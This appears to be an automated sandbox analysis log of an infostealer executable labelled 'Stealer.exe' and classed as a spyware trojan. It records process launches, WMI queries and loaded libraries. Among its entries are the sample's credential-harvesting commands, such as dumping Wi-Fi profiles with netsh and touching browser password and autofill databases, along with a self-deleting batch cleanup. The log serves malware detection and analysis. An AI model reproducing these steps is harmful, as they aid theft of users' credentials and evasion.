    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_07B3ECF00_2_07B3ECF0
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_07B3BB300_2_07B3BB30
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_07B31AD00_2_07B31AD0
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_07B3DA400_2_07B3DA40
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_07B3E7000_2_07B3E700
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_07B394A00_2_07B394A0
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_07B394D80_2_07B394D8
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_07B3DDE20_2_07B3DDE2
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_07B3ECE10_2_07B3ECE1
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_07B3DA300_2_07B3DA30
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_080E00400_2_080E0040
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_080E98570_2_080E9857
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_080EE8680_2_080EE868
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_080E1CA00_2_080E1CA0
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_080ED6DF0_2_080ED6DF
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_080E67000_2_080E6700
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_080EE5280_2_080EE528
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_080E29700_2_080E2970
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_080E8B8B0_2_080E8B8B
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_080E9F880_2_080E9F88
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_080E09900_2_080E0990
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_080E41A00_2_080E41A0
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_080E64A80_2_080E64A8
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_080E98C80_2_080E98C8
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_080E09800_2_080E0980
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_080E5FEB0_2_080E5FEB
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_080EBFE00_2_080EBFE0
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089C30980_2_089C3098
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089C3EC80_2_089C3EC8
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089C4CC80_2_089C4CC8
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089C6A080_2_089C6A08
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089C80060_2_089C8006
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089C3C480_2_089C3C48
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089C00400_2_089C0040
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089C70680_2_089C7068
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089C66600_2_089C6660
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089C4B980_2_089C4B98
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089C27980_2_089C2798
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089C29980_2_089C2998
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089C44890_2_089C4489
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089C41800_2_089C4180
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089C5CD00_2_089C5CD0
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089C001E0_2_089C001E
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089C66500_2_089C6650
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089C41700_2_089C4170
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089C47680_2_089C4768
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089FC8920_2_089FC892
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089FB8880_2_089FB888
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089F7A000_2_089F7A00
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089FA6580_2_089FA658
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089F00400_2_089F0040
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089FBB900_2_089FBB90
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089F4DC80_2_089F4DC8
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089F53F70_2_089F53F7
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089FB9EE0_2_089FB9EE
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089F8B080_2_089F8B08
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089FBD070_2_089FBD07
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089FD5200_2_089FD520
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089FC1580_2_089FC158
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089FB2DE0_2_089FB2DE
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089FAAF70_2_089FAAF7
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089FAEE90_2_089FAEE9
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089F72E00_2_089F72E0
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089F00060_2_089F0006
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089FC2200_2_089FC220
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089F52600_2_089F5260
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089F6DCD0_2_089F6DCD
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089F79F10_2_089F79F1
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089FD5190_2_089FD519
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089F71600_2_089F7160
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_089FCF600_2_089FCF60
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3364 -s 3324
    Source: VaXmr82RIb.exe, 00000000.00000002.30073132207.000000000186E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs VaXmr82RIb.exe
    Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003687000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs VaXmr82RIb.exe
    Source: VaXmr82RIb.exe, 00000000.00000000.29903268314.000000000109E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStealer.exeJ vs VaXmr82RIb.exe
    Source: VaXmr82RIb.exeBinary or memory string: OriginalFilenameStealer.exeJ vs VaXmr82RIb.exe
    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@25/18@2/2
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeCode function: 0_2_080E0990 CreateToolhelp32Snapshot,0_2_080E0990
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7264:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1972:304:WilStaging_02
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7264:304:WilStaging_02
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1972:120:WilError_03
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3364
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:304:WilStaging_02
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeFile created: C:\Users\user\AppData\Local\Temp\zc4g3vos.e4pJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpF01E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpF01E.tmp.bat
    Source: VaXmr82RIb.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 3364)
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004749000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004728000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007E7A000.00000004.00000020.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.00000000046C6000.00000004.00000800.00020000.00000000.sdmp, tmp7982.tmp.dat.0.dr, tmp7981.tmp.dat.0.dr, tmp7983.tmp.dat.0.drBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
    Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003724000.00000004.00000800.00020000.00000000.sdmp, tmp7980.tmp.dat.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004663000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004769000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.00000000046E6000.00000004.00000800.00020000.00000000.sdmp, tmp795D.tmp.dat.0.dr, tmp7960.tmp.dat.0.dr, tmp795F.tmp.dat.0.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
    Source: VaXmr82RIb.exeReversingLabs: Detection: 60%
    Source: unknownProcess created: C:\Users\user\Desktop\VaXmr82RIb.exe "C:\Users\user\Desktop\VaXmr82RIb.exe"
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpF01E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpF01E.tmp.bat
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 3364
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3364 -s 3324
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklistJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpF01E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpF01E.tmp.batJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 3364Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /NobreakJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: dwrite.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\VaXmr82RIb.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
    Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dllJump to behavior
